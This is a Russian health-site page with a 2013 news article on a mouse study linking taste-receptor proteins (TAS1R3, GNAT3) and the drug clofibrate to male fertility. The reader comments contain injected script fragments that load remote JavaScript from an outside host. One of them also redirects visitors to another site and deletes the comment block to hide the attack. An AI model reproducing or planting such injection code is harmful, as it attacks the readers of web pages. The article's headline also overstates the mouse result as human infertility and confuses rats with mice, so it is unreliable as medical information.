Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Нет вкуса – нет детей? Му...  >>  Нет вкуса – нет детей? Мужчина, не чувствующий вкус, бесплоден!
 
Обратная связь
 

Нет вкуса – нет детей? Мужчина, не чувствующий вкус, бесплоден!

Размер шрифта
12 августа 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Сенсационное открытие ученых из Филадельфии (США)! Оказывается, мужчина не чувствующий вкус еды бесплоден! Все потому что некоторые белки, отвечающие за восприятие вкуса, участвуют также в созревании сперматозоидов, мужских половых клеток.

Нет вкуса – нет детей? Мужчина, не чувствующий вкус бесплоден!

«В ходе нашего исследования мы впервые обнаружили связь между вкусовым анализатором и мужской репродуктивной системой», – отмечает Бедрих Мосинджер, один из научных сотрудников.

По иронии судьбы, это открытие стало по сути случайным. Ученые проводили испытания на мышах, пытаясь выяснить некоторые аспекты вкусового восприятия. При этом оказалось, что некоторые самцы почему-то не могут оставить потомство. Выяснилось, что у этих мышей отсутствуют два белка, выполняющих регуляторную функцию в процессе восприятия вкуса. Этим белкам присвоены кодовые названия TAS1R3 (один из компонентов рецептора, воспринимающего сладкое) и GNAT3 (этот белок участвует в процессе трансформации вкусового ощущения в нервный импульс).

Ранее эти белки обнаруживались в яичках и сперме, однако значение этих молекул для половой системы было неясным. Ученые из Филадельфии сумели приоткрыть завесу тайны.

Используя методики генетической инженерии, исследователи вывели крыс, лишенных вышеупомянутых белков. При этом им «вживили» человеческую версию рецептора TAS1R3. Эти мыши стали плодовиты.

Вы спросите – к чему такие сложные манипуляции? Зачем понадобился этот человеческий белок? Дело в том, что ученые располагают лекарством, которое блокирует человеческий вариант рецептора TAS1R3. Это лекарство называется «клофибрат», в медицине его применяет для лечения нарушений жирового обмена. Специалисты добавили его в рацион мышей, в результате чего мыши стали стерильными. Но стерильность эта была обратимой – стоило исключить клофибрат из мышиной диеты, и животные благополучно размножались.

«Результаты нашего исследования наталкивают на определенные выводы», – говорит Мосинджер. «Клофибрат – очень распространенный препарат. Кроме того, в сельском хозяйстве широко используются феноксигербициды, которые очень напоминают его по структуре и также блокируют TAS1R3. Возможны, эти обстоятельства играют не последнюю роль в стремительном распространении мужского бесплодия по всему миру».

Мосинджер также отмечает, что есть и поводы для оптимизма. «Оповещен – значит вооружен: зная о побочных эффектах клофибрата, мы не будем застигнуты врасплох и сможем эффективно с ними бороться. Кроме того, наше открытие вносит неоценимый вклад в разработку мужских негормональных контрацептивов», – говорит ученый.

Пока ученные разрабатывают конкретные лекарства, проверьте вкус своего возлюбленного. Кто знает, может ваши планы с ним поменяются.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:07

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.